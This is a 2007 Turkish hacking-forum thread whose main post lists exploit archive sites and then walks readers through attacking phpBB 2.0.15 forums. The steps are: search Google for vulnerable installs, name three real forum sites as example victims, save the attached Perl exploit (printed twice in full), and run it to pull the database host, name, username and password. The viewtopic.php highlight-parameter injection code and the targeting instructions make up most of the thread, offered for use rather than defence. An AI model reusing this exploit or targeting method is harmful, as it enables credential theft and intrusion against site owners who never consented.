PortalliPortalli  ForumForum  AnasayfaAnasayfa  TakvimTakvim  SSSSSS  AramaArama  Kayıt OlKayıt Ol  Üye ListesiÜye Listesi  Kullanıcı GruplarıKullanıcı Grupları  YöneticilerYöneticiler  Giriş yap  

Paylaş | 
 

 ExpLoit SiteLeri & Detayı Bilgi

Aşağa gitmek 
YazarMesaj
HackerErDm
Moderators
Moderators


Erkek
Mesaj Sayısı : 22
Yaş : 25
Kayıt tarihi : 20/08/07

MesajKonu: ExpLoit SiteLeri & Detayı Bilgi   Ptsi Ağus. 20, 2007 1:02 pm

http://www.packetstormsecurity.nl/

http://www.phreak.org/html/exploits.shtml/

http://www.hack.co.za/

http://www.frsirt.com/exploits/

http://www.e-hack.org/exploit/

http://www.packetstormsecurity.org/

http://h4cky0u.org/

http://www.packetstormsecurity.org//

http://www.securitytracker.com/alert...b/1009067.html/

http://www.milw0rm.com/

Burdan bazı exploitLeri bulabiLirsiniz

--------------------------------------------------------------------------------


ArTık HerKes expLoit kuLLanabiLecek...

Arkadaslar onceLikLe kuLLanacagımız programı download edeLim
aCtivePerl


http://www.inndir.com/inndir.php?id=18025/


Programı indirdikten sonra zipten cıkardıgımızda perL diye bir kLasor var bide aynı klasorun icinde toplu isLem dosyası var ona cift tıklayınca program kendi kendini pc yukLemeye basLıyor yukLediniz.



Simdi Googleyi acıyoruz ve ( Powered by phpbb 2.0.15 ) Bunu aratıyoruz ve bir suru site cıkacak.

Örnegin bizim forum sitesinin en altında
Powered by ********* Version 3.5.0 Release Candidate 3 Copyright ©2000 - 2005, Jelsoft Enterprises Ltd. yazıyor isTe bizimde Googlede aratıgımız sitenin en altında (Powered by phpbb 2.0.15) yazacak bunun.

Ve kendimize bir kac kurban buLduk ben 1 2 örnek site yazayım

http://www.politicaldiscussion.info/forum
http://www.atwatcher.com/forums
http://www.rokulabs.com/forums

Simdi sıra geLdi bu sitelere uygun exploiti buLmaya onuda size veriyoRum buyrun

Kod:
#!/usr/bin/perl
# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************
use IO::Socket;
print "+-----------------------------------------------------------------------+\\r\\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\\r\\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\\r\\n";
print "+-----------------------------------------------------------------------+\\r\\n";
if (@ARGV < 3)
{
print "Usage:\\r\\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\\r\\n\\r\\n";
print "SERVER - Server where PhpBB is installed.\\r\\n";
print "DIR - PHPBB directory or / for no directory.\\r\\n";
print "THREADID - Id of an existing thread.\\r\\n";
print "COOKIESTRING - Optional, cookie string of the http request.\\r\\n";
print " Use this when a thread needs authentication for viewing\\r\\n";
print " You can use Firefox in combination with \\"Live HTTP\\r\\n";
print " Headers\\" to get this cookiestring.\\r\\n\\r\\n";
print "Example 1 (with cookiestring):\\r\\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \\"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A“
autologinid“%3Bs%3A0%3A““%3Bs%3A6%3A“
userid“%3Bs%3A1%3A“2“%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\\" \\r\\n\\r\\n";
print "Example 2 (without cookiestring):\\r\\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \\r\\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\\/\\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight=’.printf($delimit.";
$sploit .= "\\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\\$dbpasswd.";
$sploit .= "$delimit).’";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\\n\\n";
print "[+] Connecting OK\\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\\r\\n";
print $sock "Host: $serv\\r\\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \\r\\n";
}
print $sock "Connection: close\\r\\n\\r\\n";

$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\\n";
sleep(1);
print "[+] Username: " . $array[2] . "\\n";
sleep(1);
print "[+] Password: " . $array[3] . "\\n";
sleep(1);
} else {
print "FAILED\\n";
}
#!/usr/bin/perl
# ************************************************** ************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# ************************************************** ************
use IO::Socket;
print "+-----------------------------------------------------------------------+\\r\\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\\r\\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\\r\\n";
print "+-----------------------------------------------------------------------+\\r\\n";
if (@ARGV < 3)
{
print "Usage:\\r\\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\\r\\n\\r\\n";
print "SERVER - Server where PhpBB is installed.\\r\\n";
print "DIR - PHPBB directory or / for no directory.\\r\\n";
print "THREADID - Id of an existing thread.\\r\\n";
print "COOKIESTRING - Optional, cookie string of the http request.\\r\\n";
print " Use this when a thread needs authentication for viewing\\r\\n";
print " You can use Firefox in combination with \\"Live HTTP\\r\\n";
print " Headers\\" to get this cookiestring.\\r\\n\\r\\n";
print "Example 1 (with cookiestring):\\r\\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \\"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A“
autologinid“%3Bs%3A0%3A““%3Bs%3A6%3A“
userid“%3Bs%3A1%3A“2“%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\\" \\r\\n\\r\\n";
print "Example 2 (without cookiestring):\\r\\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \\r\\n";
exit();
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];
$serv =~ s/http:\\/\\///ge;
$delimit = "GvRSecureD";
$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight=’.printf($delimit.";
$sploit .= "\\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\\$dbpasswd.";
$sploit .= "$delimit).’";
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\\n\\n";
print "[+] Connecting OK\\n";
sleep(1);
print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\\r\\n";
print $sock "Host: $serv\\r\\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \\r\\n";
}
print $sock "Connection: close\\r\\n\\r\\n";

$succes = 0;
while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}
close($sock);
if ($succes == 1) {
print "OK\\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\\n";
sleep(1);
print "[+] Username: " . $array[2] . "\\n";
sleep(1);
print "[+] Password: " . $array[3] . "\\n";
sleep(1);
} else {
print "FAILED\\n";
}



Bunu Metin Belegesi olarak kaydedin. Ardından dosyayı aCın adını ve uzantısını degistirecegiz metin belgesi.txt dosyasıya bunu Farklı Kaydet deyip php.pL diye kaydediyoruz uzanısı ---> pL <--- diye bu cok onemLi kaydettikten sonra Kes veya Ctrl+X deyip C: surucusunun icinde perl klasoru vaR onun icindede Bin klasoru var oraya Yapıstır veya Ctrl+V yapıyoruz

İzledigimiz yoL söyLe c:\\perl\\bin buraya yaPıstırıyoruz

Simdi iSimiz neredeyse bitti BaşLat/çalıştır=cmd yazıyoruz enter diyoruz
Perl klasorumuz nerdeyse o dizine gidiyoruz mesela benim
c\\:dokument setting\\a burdan cıkmak icin 2 sefer cd.. enter taki kok surcuye uLasana kadar yani c\\: kalana kadar ve ardından c:\\ cd perl Enter
Bu seferde c:\\perl cd bin Enter dedikten sonra soyle bisey olacak c:\\Perl\\bin bunu kendim icin örnek verdim sizin soylede olabilir c:\\perl\\perl\\bin
Simdi perl’i yukledigimiz klasoru bulduk sıra exploiti calıstırmaya geldi
sunu yazıyoruz c\\:Perl\\bin>perL php.pl Enter

exploitimiz calısıyor tamamdır
ardından c\\:Perl\\bin>perL php.pl www.kurbansite.com/forumyolu/ 8 enter
benim verdigim sitelerde örnek yapaLım

c\\:Perl\\bin>perl php.pl www.rokulabs.com/forums/ 8 enter diyoruz arkadaslar burda oneLi olan forum yolu mesela /forums/ olabilir /forum/ olabilir veya sallıyorum /fiendishman/ olabilir buna dikkat edecegiz cok önemli
her seyi eksiksiz yaPtıgınızı farz ediyorum uygun
c\\perL\\bin>perl php.pl www.kurbansite.com/forums/ 8 enter dediniz aha bizde sitenin

Data base name :
Data Base host :
User name :
Password:

Eğer şu hata iLetisini verirse --->Sending exploit failed <--- ya siz bir yerde hata yapmıssınız ya o site bu acıgını kapatmıs yada bu exploit bu siteye uygun degiLdir...
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör
stings68
System RooT
System RooT
avatar

Mesaj Sayısı : 227
Şehir : Hack ALemi | HackTurkiye
Meslek : Hack | Sanal | Security
Kayıt tarihi : 30/07/07

MesajKonu: Geri: ExpLoit SiteLeri & Detayı Bilgi   Ptsi Ağus. 20, 2007 1:11 pm

eyw elıne saglık

_________________
Sayfa başına dön Aşağa gitmek
Kullanıcı profilini gör http://www.hackturkiye.ile.biz
 
ExpLoit SiteLeri & Detayı Bilgi
Sayfa başına dön 
1 sayfadaki 1 sayfası
 Similar topics
-
» Bazı Müzik Aletleri Hakkında Bilgi
» Ferrari Bilgileri
» Atatürk Üniversitesi Öğretim Görevlileri
» Orgonik Tarım Hakkında Bilgi

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
 ::  :: WEB Security-
Buraya geçin: